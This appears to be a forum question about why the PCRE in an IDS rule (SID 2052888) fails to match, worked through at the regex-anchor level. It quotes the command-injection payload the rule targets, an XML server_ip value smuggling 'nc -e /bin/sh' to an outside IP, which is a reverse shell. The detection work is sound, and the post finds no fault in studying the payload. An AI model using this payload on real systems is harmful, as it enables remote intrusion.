Hi,
Could you help me understand the pcre in SID:2052888?
Just looking at the content matches for the malicious XML payload, which are:
content:"<server_ip"; nocase; fast_pattern; pcre:"/^\b[^>]*>[^\x3b<]+\x3b[^<]+</server_ip>/Rsi";
Which should detect the demonstrated payload:
<server_ip>127.0.0.1; nc -e /bin/sh 10.0.40.83 443; </server_ip>
However, I am unable to trigger the alert with a test pcap. I think it’s because the pcre is relative to the content match “<server_ip”, leaving the detection cursor at the beginning of “>127.0.0.1; nc -e /bin/sh 10.0.40.83 443; </server_ip>” for the pcre, which can only start if there’s a string that begins with a word character (^\b), which it cannot because the first character it comes across is a “>”.
This is actually the first time I have seen ^\b, I may misunderstand its intent. I am able to get the rule to trigger by changing the first content match, to “<server_i” for example, to leave a word character at the start for the pcre match.
Thank you.